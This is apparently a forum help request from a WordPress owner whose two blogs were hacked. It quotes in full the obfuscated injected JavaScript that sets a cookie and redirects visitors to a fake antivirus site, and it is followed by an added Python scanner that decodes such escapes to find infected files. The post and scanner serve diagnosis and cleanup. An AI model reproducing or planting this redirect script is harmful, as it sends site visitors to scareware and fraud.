Hack/malware redirecting to another site
I have two WordPress blogs which are under virtual subdomains on the same domain:
http://aiheet.domnik.net/
http://lr.domnik.net/
(Both are in Finnish.)
Now in both of them the content is occasionally replaced with malicious JavaScript code that redirects the browser to the fake antivirus site computer-antivirus03.com.
The content that the script writes over can be the blog home page, an individual post or page, and sometimes even a css style sheet. The script is not always the same, but looks somewhat like this:
<script type="text/javascript" language="javascript"> var lprcb=new Date( ); lprcb.setTime(lprcb.getTime( )+12*60*60*1000); document.cookie="\x6e\x5f\x73\x65\x73s\x5f\x69d\x3d\x30\x64\x38\x657cba\x65\x64\x63\x39\x61\x34\x35\x371\x61\x62e\x37\x61\x37\x32\x35\x36\x64\x31e\x65\x617"+"\x3b\x20path=/;\x20expire\x73="+lprcb.toGMTString( ); </script>
<script type="text/javascript" language="javascript"> var iyssffn=new Array("ht\x74\x70://t\x68e-off\x73\x70\x72\x69\x6e\x67\x2e\x63\x6e/\x3f\x70i\x64\x3d1\x38\x30s0\x38\x26s\x69\x64\x3d3c\x357\x37\x39","\x68\x74tp:\x2f\x2f\x74h\x65-o\x66fsp\x72ing.c\x6e\x2f\x3fpi\x64\x3d\x31\x380\x73\x30\x39\x26si\x64\x3d3\x635\x377\x39"); var kumh="\143\x61,co\x2c\144\x61,de,c\x79,el\x2cen,\x65o,e\x73,fi\x2cfr\x2cga\x2ci\x74,j\x61,j\x69,\x6bn\x2cnl\x2cno\x2cpt\x2csv"; var wlmnfsc=navigator.language || navigator.systemLanguage; var lang=wlmnfsc.toLowerCase( ); lang=lang.substr(0,2); if (kumh.indexOf(lang)==-1){zeck( ); }else {eylgnov(omqmeq( )?iyssffn[0]:iyssffn[1]); }function eylgnov(hrnmj){if (top.location.href!=window.location.href){top.location=hrnmj; }else {document.writeln("\x3cM\x45\x54A \x48TTP-EQ\x55IV=47Re\x66res\x6847\x20C\x4fNT\x45N\x54=470;\x20UR\x4c="+hrnmj+"\x27>"); document.writeln("74meta ht\x74\160\x2dequiv\x3d47\x70ra\x67ma\x27 co\x6eten\x74=\x27no\x2dca\x63he\x27>"); document.writeln("\x3cmeta \x6e\141\x6de=47\x72o\x62ots\x27 con\x74en\x74=47noi\x6ede\x78,n\x6ff\x6fll\x6fw\x27>"); }}function zeck( ){eylgnov(omqmeq( )?iyssffn[2]:iyssffn[3]); return; }function omqmeq( ){alert(document.referrer); return document.referrer.indexOf("\x67oo\x67\x6ce.") || document.referrer.indexOf("\x79ahoo.") || document.referrer.indexOf("bi\x6eg."); } </script>
It doesn’t show up every time. Sometimes I have to browse around for a while before I can see it.
For two more examples (first one is the same as above), see:
What have I already done:
I replaced all the core files in both blogs with brand new ones from a new WordPress download (it was version 2.8.4 already when hacked).
I examined my template files and didn’t find anything suspicious.
I removed all plugins that I don’t use.
I uploaded the plugins Antivirus, WordPress Exploit Scanner and WP Security Scan to see if they find something. I corrected one chmod proposed by WP Security Scan (wp-admin/index.php to chmod 644). It also said “The file .htaccess does not exist in wp-admin/.” Should I have one there?
Exploit Scanner found some suspicious “String.fromCharCode” and “shell_exec” in several files, but those seem to exist in clean WordPress files too.
I have contacted my webhost (I am on shared hosting) and sent them basically the same info. No reply yet.
I have changed all the passwords (they were randomly generated before and they are still randomly generated).
I am the only one who has admin rights to the blogs, and for the last few months I have accessed them only from my own computer, which runs Ubuntu. The other blog has one co-blogger, but he has only editor rights.
Any ideas how to proceed and get rid of the code?
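As an added example (not from the original post or its replies), a small Python scanner that decodes the \xNN and \NNN string escapes the injected script relies on and flags script blocks carrying many of them, so the affected files and the decoded redirect destinations can be located across an install. The sample HTML is constructed to mirror the injected script's shape; the directory walk, suffix list and threshold are assumptions.

```python
import re
from pathlib import Path

# JavaScript \xNN hex and \NNN octal string escapes, as used in the injected script.
ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})')
SCRIPT_RE = re.compile(r'<script[^>]*>(.*?)</script>', re.IGNORECASE | re.DOTALL)
# Behaviours seen in the injected script: cookie set, top-frame redirect, meta refresh, referrer check.
SUSPICIOUS = ('document.cookie', 'top.location', 'http-equiv', 'document.referrer')

def decode_escapes(s):
    """Resolve \\xNN and \\NNN escapes so obfuscated strings become readable."""
    def repl(m):
        return chr(int(m.group(1), 16)) if m.group(1) else chr(int(m.group(2), 8))
    return ESCAPE_RE.sub(repl, s)

def scan_text(text, min_escapes=10):
    """Return one finding per <script> block that is heavily hex/octal-escaped."""
    findings = []
    for m in SCRIPT_RE.finditer(text):
        body = m.group(1)
        n = len(ESCAPE_RE.findall(body))
        if n < min_escapes:          # a lone escape in normal code is not suspicious
            continue
        decoded = decode_escapes(body).lower()
        hits = [k for k in SUSPICIOUS if k in decoded]
        urls = re.findall(r'https?://[^\s"\'<>]+', decoded)   # decoded redirect targets
        findings.append({'escapes': n, 'indicators': hits, 'urls': urls})
    return findings

def scan_tree(root, suffixes=('.php', '.html', '.js', '.css')):
    """Walk a WordPress install (assumed layout) and report files carrying such a script."""
    report = {}
    for p in Path(root).rglob('*'):
        if p.is_file() and p.suffix.lower() in suffixes:
            found = scan_text(p.read_text(errors='replace'))
            if found:
                report[str(p)] = found
    return report

# Constructed sample modelled on the injected script; the host is a reserved test name.
SAMPLE = ('<html><script type="text/javascript">var c=new Date();'
          'document.cookie="\\x6e\\x5f\\x73\\x65\\x73s_id=1;\\x20path=/";'
          'var u=new Array("ht\\x74\\x70://example\\x2einvalid/\\x3fpid\\x3d1");'
          'if(top.location.href!=window.location.href){top.location=u[0];}'
          '</script><p>normal content</p>'
          '<script>var x = "plain \\x41";</script></html>')

if __name__ == '__main__':
    for finding in scan_text(SAMPLE):
        print(finding)
```

Run scan_tree() against a copy of the site's document root; files listed in the report are the ones to diff against a clean WordPress copy or restore.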